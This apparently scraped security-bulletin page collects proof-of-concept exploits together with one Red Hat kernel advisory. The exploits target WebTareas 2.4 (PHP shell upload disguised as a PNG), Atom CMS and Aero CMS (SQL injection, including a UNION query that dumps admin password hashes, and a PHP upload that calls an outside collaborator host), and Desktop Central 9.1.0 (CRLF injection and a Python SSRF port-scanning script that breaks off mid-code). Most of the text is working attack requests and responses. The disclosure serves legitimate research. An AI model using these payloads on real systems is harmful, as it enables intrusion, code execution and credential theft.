WebTareas version 2.4 suffers from a remote shell upload vulnerability.

    # Exploit Title: WebTareas 2.4 - RCE (Authorized)# Date: 15/10/2022# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://sourceforge.net/projects/webtareas/# Software Link: https://sourceforge.net/projects/webtareas/# Version: 2.4# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example in forum -> members forum -> chat-----------------------------------------------------------------------------------------------------------------------Param: chatPhotos0-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /webtareas/includes/chattab_serv.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: */*Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------13392153614835728094189311126Content-Length: 6852Origin: http://127.0.0.1Connection: closeReferer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=addCookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------13392153614835728094189311126Content-Disposition: form-data; name="action"sendPhotos-----------------------------13392153614835728094189311126Content-Disposition: form-data; name="chatTo"2-----------------------------13392153614835728094189311126Content-Disposition: form-data; name="chatType"P-----------------------------13392153614835728094189311126Content-Disposition: form-data; name="chatPhotos0"; filename="snupi.php"Content-Type: image/pngPNG[...]<?php phpinfo();?>[...]-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 11:27:41 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 661Connection: closeContent-Type: application/json{"content":"<div class=\"message\"><div class=\"message-left\"><img class=\"avatar\" src=\"..\/includes\/avatars\/f2.png?ver=1665796223\"><\/div><div class=\"message-right\"><div class=\"message-info\"><div class=\"message-username\">Administrator<\/div><div class=\"message-timestamp\">2022-10-15 13:27<\/div><\/div><div class=\"photo-box\"><img src=\"..\/files\/Messages\/7.php\" onclick=\"javascript:showFullscreen(this);\"><div class=\"photo-action\"><a href=\"..\/files\/Messages\/7.php\" download=\"snupi.php\"><img title=\"Zaoszcz\u0119dzi\u0107\" src=\"..\/themes\/camping\/btn_download.png\"><\/a><\/div><label>snupi.php<\/label><\/div><\/div><\/div>"}-----------------------------------------------------------------------------------------------------------------------See link: /files\/Messages\/7.php-----------------------------------------------------------------------------------------------------------------------Req:-----------------------------------------------------------------------------------------------------------------------GET /webtareas/files/Messages/7.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: image/avif,image/webp,*/*Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeReferer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=addCookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1Sec-Fetch-Dest: imageSec-Fetch-Mode: no-corsSec-Fetch-Site: same-origin-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 11:28:16 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Powered-By: PHP/7.4.30Connection: closeContent-Type: text/html; charset=UTF-8Content-Length: 89945[...]<title>PHP 7.4.30 - phpinfo()</title>[...]<h1 class="p">PHP Version 7.4.30</h1></td></tr></table><table><tr><td class="e">System </td><td class="v">Windows NT DESKTOP-LE3LSIM 10.0 build 19044 (Windows 10) AMD64 </td></tr><tr><td class="e">Build Date </td><td class="v">Jun  7 2022 16:22:15 </td></tr><tr><td class="e">Compiler </td><td class="v">Visual C++ 2017 [...]

WebTareas 2.4 Remote Shell Upload

Atom CMS version 2.0 suffers from a remote SQL injection vulnerability. Original discovery of this issue in this version is attributed to Luca Cuzzolin in February of 2022.

    # Exploit Title: Atom CMS v2.0 - SQL Injection (no auth)# Date: 15/10/2022# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://github.com/thedigicraft/Atom.CMS# Software Link: https://github.com/thedigicraft/Atom.CMS# Version: 2.0# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example-----------------------------------------------------------------------------------------------------------------------Param: id-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /Atom.CMS-master/admin/index.php?page=users&id=(select*from(select(sleep(10)))a) HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 93Origin: http://127.0.0.1Connection: closeReferer: http://127.0.0.1/Atom.CMS-master/admin/index.php?page=users&id=1Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1first=Alan2n&last=Quandt&email=alan%40alan.com&status=1&password=&passwordv=&submitted=1&id=1--------------------------------------------------------------------------------------------------------------------- --Response wait 10 sec-----------------------------------------------------------------------------------------------------------------------Other URL and params-----------------------------------------------------------------------------------------------------------------------/Atom.CMS-master/admin/index.php [email]/Atom.CMS-master/admin/index.php [id]/Atom.CMS-master/admin/index.php [slug]/Atom.CMS-master/admin/index.php [status]/Atom.CMS-master/admin/index.php [user]

Atom CMS 2.0 SQL Injection

Aero CMS version 0.l0.1 remote shell upload exploit. Original discovery of this issue in this version is attributed to D4rkP0w4r in April of 2022.

# Exploit Title: Aero CMS v0.0.1 - PHP Code Injection (auth)  
# Date: 15/10/2022  
# Exploit Author: Hubert Wojciechowski  
# Contact Author: hub.woj12345@gmail.com  
# Vendor Homepage: https://github.com/MegaTKC/AeroCMS  
# Software Link: https://github.com/MegaTKC/AeroCMS  
# Version: 0.0.1  
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

## Example   
-----------------------------------------------------------------------------------------------------------------------  
Param: image content uploading image  
-----------------------------------------------------------------------------------------------------------------------  
Req  
-----------------------------------------------------------------------------------------------------------------------

POST /AeroCMS-master/admin/posts.php?source=add_post HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: pl,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------369779619541997471051134453116  
Content-Length: 1156  
Origin: http://127.0.0.1  
Connection: close  
Referer: http://127.0.0.1/AeroCMS-master/admin/posts.php?source=add_post  
Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1

-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_title"

mmmmmmmmmmmmmmmmm  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_category_id"

1  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_user"

admin  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_status"

draft  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="image"; filename="at8vapghhb.php"  
Content-Type: text/plain

<?php printf("bh3gr8e32s".(7*6)."ci4hs9f43t");gethostbyname("48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oasti"."fy.com");?>  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_tags"

-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="post_content"

<p>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm</p>  
-----------------------------369779619541997471051134453116  
Content-Disposition: form-data; name="create_post"

Publish Post  
-----------------------------369779619541997471051134453116--

-----------------------------------------------------------------------------------------------------------------------  
Res:  
-----------------------------------------------------------------------------------------------------------------------

The Collaborator server received a DNS lookup of type A for the domain name 48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oastify.com.

Aero CMS 0.0.1 Remote Shell Upload

Aero CMS version 0.0.1 suffers from multiple remote SQL injection vulnerabilities. Original discovery of this issue in this version is attributed to nu11secur1ty in August of 2022.

    # Exploit Title: Aero CMS v0.0.1 - SQL Injection (no auth)# Date: 15/10/2022# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://github.com/MegaTKC/AeroCMS# Software Link: https://github.com/MegaTKC/AeroCMS# Version: 0.0.1# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example SQL Injection-----------------------------------------------------------------------------------------------------------------------Param: search-----------------------------------------------------------------------------------------------------------------------Req sql ini detect-----------------------------------------------------------------------------------------------------------------------POST /AeroCMS-master/search.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: http://127.0.0.1/AeroCMS-master/Content-Type: application/x-www-form-urlencodedAccept-Language: en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 21search=245692'&submit=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 03:07:06 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40X-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheContent-Length: 3466Connection: closeContent-Type: text/html; charset=UTF-8[...]Query failed You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%'' at line 1-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /AeroCMS-master/search.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: http://127.0.0.1/AeroCMS-master/Content-Type: application/x-www-form-urlencodedAccept-Language: en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 21search=245692''&submit=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 03:07:10 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40X-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 94216[...]-----------------------------------------------------------------------------------------------------------------------Req exploiting sql ini get data admin-----------------------------------------------------------------------------------------------------------------------POST /AeroCMS-master/search.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: http://127.0.0.1/AeroCMS-master/Content-Type: application/x-www-form-urlencodedAccept-Language: en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 113search=245692'+union+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+users#&submit=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 05:40:05 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40X-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 101144[...]                    <a href="#">admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne,admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne</a>[...]-----------------------------------------------------------------------------------------------------------------------Other URL and params-----------------------------------------------------------------------------------------------------------------------/AeroCMS-master/admin/posts.php [post_title]/AeroCMS-master/admin/posts.php [filename]/AeroCMS-master/admin/profile.php [filename]/AeroCMS-master/author_posts.php [author]/AeroCMS-master/category.php [category]/AeroCMS-master/post.php [p_id]/AeroCMS-master/search.php [search]/AeroCMS-master/admin/categories.php [cat_title]/AeroCMS-master/admin/categories.php [phpwcmsBELang cookie]/AeroCMS-master/admin/posts.php [post_content]/AeroCMS-master/admin/posts.php [p_id]/AeroCMS-master/admin/posts.php [post_category_id]/AeroCMS-master/admin/posts.php [post_title]/AeroCMS-master/admin/posts.php [reset]

Aero CMS 0.0.1 SQL Injection

Red Hat Security Advisory 2023-1469-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include a double free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2023:1469-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1469  
Issue date:        2023-03-27  
CVE Names:         CVE-2022-4269 CVE-2022-4744 CVE-2023-0266   
=====================================================================

1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Real Time (v. 9) - x86_64  
Red Hat Enterprise Linux Real Time for NFV (v. 9) - x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: tun: avoid double free in tun_free_netdev (CVE-2022-4744)

* ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
(CVE-2023-0266)

* kernel: net: CPU soft lockup in TC mirred egress-to-ingress action  
(CVE-2022-4269)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* kernel-rt: update RT source tree to the latest RHEL-9.1.z3 Batch  
(BZ#2170460)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2150272 - CVE-2022-4269 kernel: net: CPU soft lockup in TC mirred egress-to-ingress action  
2156322 - CVE-2022-4744 kernel: tun: avoid double free in tun_free_netdev  
2163379 - CVE-2023-0266 ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF

6. Package List:

Red Hat Enterprise Linux Real Time for NFV (v. 9):

Source:  
kernel-rt-5.14.0-162.22.2.rt21.186.el9_1.src.rpm

x86_64:  
kernel-rt-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-core-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debug-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debug-core-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debug-debuginfo-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debug-devel-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debug-kvm-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debug-modules-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debug-modules-extra-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debuginfo-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-devel-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-kvm-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-modules-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-modules-extra-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm

Red Hat Enterprise Linux Real Time (v. 9):

Source:  
kernel-rt-5.14.0-162.22.2.rt21.186.el9_1.src.rpm

x86_64:  
kernel-rt-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-core-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debug-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debug-core-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debug-debuginfo-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debug-devel-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debug-modules-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debug-modules-extra-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debuginfo-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-devel-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-modules-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm  
kernel-rt-modules-extra-5.14.0-162.22.2.rt21.186.el9_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4269  
https://access.redhat.com/security/cve/CVE-2022-4744  
https://access.redhat.com/security/cve/CVE-2023-0266  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCFeo9zjgjWX9erEAQgTUg//fBVoxwGBUaAb9nrFYK8q0g1KSW54WFsi  
zHPZXQ4a6jvHF4Zh2uA50BV5mljbm4NsGLTw+beeJrPvEVreIlsF+AFvwtGzLF3I  
ELMtdGDTDgCG+A3tTtlr0IAYdshunP5TEiUobiO5Ad6Olf+6nWFaiLCSZzGn8uE6  
KucMrENdG41cxU/2V9zlYaAhUcyZ5rzo2xJLeWFKDeThZnhAUsMd1ymMKwtD96f5  
h1BHD1egkmhNMKsT0GZwMxxG/kGgvtvEW3vT/QOS/V8/8Hzc+XYvrs0w3Q0n9wLf  
cJrLyehUd8BHsQaV/sgATq5sW+07R133v6wuIWOADQk+Ns8oblZUQ6OxZ+08VT/y  
Y/Vkm8q6ei3LUuFizdjsoDN4Jy8woFNY6LxrtVgbqY9vC9teuaMTsSL9uP0cV3TC  
Jx2DXF4B9QMX2ID7lPgipmEQkXqJwtyGFfvDADXP4xP+JtZc4/AdxEtU6bd7k5lE  
05Fme21iZ+2eQ87ENLkJ/HiSDgiNjwYLmt2g+QT1fI/XTd/iI7x+lMRbIFMnelM+  
DX5gt/RerNgzQSIhfT42+XAnzsQkL1aIWWXYgyJ7F7wM4JAaFhq+8n3BqL/q/Yp4  
prEMAYOGp7rae/y5a5BMjnt+VjaU/k1WF6t4e7LyJoX94Eo8EuhUy2slMsaGvxBr  
skVp9tUzijI=  
=uISX  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1469-01

Desktop Central version 9.1.0 suffers from crlf injection, and server-side request forgery vulnerabilities.

    # Exploit Title: Desktop Central 9.1.0 - Multiple Vulnerabilities# Discovery by: Rafael Pedrero# Discovery Date: 2021-02-14# Software Link : http://www.desktopcentral.com# Tested Version: 9.1.0 (Build No: 91084)# Tested on:  Windows 10# Vulnerability Type: CRLF injection (CRLF) - 1CVSS v3: 6.1CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-93Vulnerability description: CRLF injection vulnerability in ManageEngineDesktop Central 9.1.0 allows remote attackers to inject arbitrary HTTPheaders and conduct HTTP response splitting attacks via the fileNameparameter in a /STATE_ID/1613157927228/InvSWMetering.csv.Proof of concept:GEThttps://localhost/STATE_ID/1613157927228/InvSWMetering.csv?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=trueHTTP/1.1User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101Firefox/85.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3DNT: 1Connection: keep-aliveReferer:https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMeteringUpgrade-Insecure-Requests: 1Content-Length: 0Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;showRefMsg=false; summarypage=false;DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;JSESSIONID=0B20DEF653941DAF5748931B67972CDB;JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024Host: localhostResponse:HTTP/1.1 200 OKDate:Server: ApachePragma: publicCache-Control: max-age=0Expires: Wed, 31 Dec 1969 16:00:00 PSTSET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;SecureSet-Cookie: buildNum=91084; Path=/Set-Cookie: showRefMsg=false; Path=/Set-Cookie: summarypage=false; Path=/Set-Cookie: dc_customerid=1; Path=/Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/Set-Cookie: screenResolution=1280x1024; Path=/Content-Disposition: attachment; filename=anySet-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013.csvX-dc-header: yesContent-Length: 95Keep-Alive: timeout=5, max=20Connection: Keep-AliveContent-Type: text/csv;charset=UTF-8# Vulnerability Type: CRLF injection (CRLF) - 2CVSS v3: 6.1CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-93Vulnerability description: CRLF injection vulnerability in ManageEngineDesktop Central 9.1.0 allows remote attackers to inject arbitrary HTTPheaders and conduct HTTP response splitting attacks via the fileNameparameter in a /STATE_ID/1613157927228/InvSWMetering.pdf.Proof of concept:GEThttps://localhost/STATE_ID/1613157927228/InvSWMetering.pdf?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=trueHTTP/1.1User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101Firefox/85.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3DNT: 1Connection: keep-aliveReferer:https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMeteringUpgrade-Insecure-Requests: 1Content-Length: 0Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;showRefMsg=false; summarypage=false;DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;JSESSIONID=0B20DEF653941DAF5748931B67972CDB;JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024Host: localhostHTTP/1.1 200 OKDate:Server: ApachePragma: publicCache-Control: max-age=0Expires: Wed, 31 Dec 1969 16:00:00 PSTSET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;SecureSet-Cookie: buildNum=91084; Path=/Set-Cookie: showRefMsg=false; Path=/Set-Cookie: summarypage=false; Path=/Set-Cookie: dc_customerid=1; Path=/Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/Set-Cookie: screenResolution=1280x1024; Path=/Content-Disposition: attachment; filename=anySet-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013X-dc-header: yesContent-Length: 4470Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/pdf;charset=UTF-8# Vulnerability Type: Server-Side Request Forgery (SSRF)CVSS v3: 8.0CVSS vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:HCWE: CWE-918 Server-Side Request Forgery (SSRF)Vulnerability description: Server-Side Request Forgery (SSRF) vulnerabilityin ManageEngine Desktop Central 9.1.0 allows an attacker can force avulnerable server to trigger malicious requests to third-party servers orto internal resources. This vulnerability allows authenticated attackerwith network access via HTTP and can then be leveraged to launch specificattacks such as a cross-site port attack, service enumeration, and variousother attacks.Proof of concept:Save this content in a python file (ex. ssrf_manageenginedesktop9.py),change the variable sitevuln value with ip address:import argparsefrom termcolor import coloredimport requestsimport urllib3import datetimeurllib3.disable_warnings()print(colored('''------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------''',"red"))def smtpConfig_ssrf(target,port,d):    now1 = datetime.datetime.now()    text = ''    sitevuln = 'localhost'    url = 'https://'+sitevuln+'/smtpConfig.do?actionToCall=valSmtpConfig&smtpServer='+target+'&smtpPort='+port+'&senderAddress=admin%40manageengine.com&validateUser=false&tlsEnabled=false&smtpsEnabled=false&toAddress=admin%40manageengine.com'    cookie = 'DCJSESSIONID=A9F4AB5F4C43AD7F7D2C4D7B002CBE73;buildNum=91084; showRefMsg=false; dc_customerid=1; summarypage=false;JSESSIONID=D10A9C62D985A0966647099E14C622F8;DCJSESSIONIDSSO=DFF8F342822DA6E2F3B6064661790CD0'    try:        response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0(Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3','Referer': 'https://192.168.56.250:8383/smtpConfig.do','Cookie':        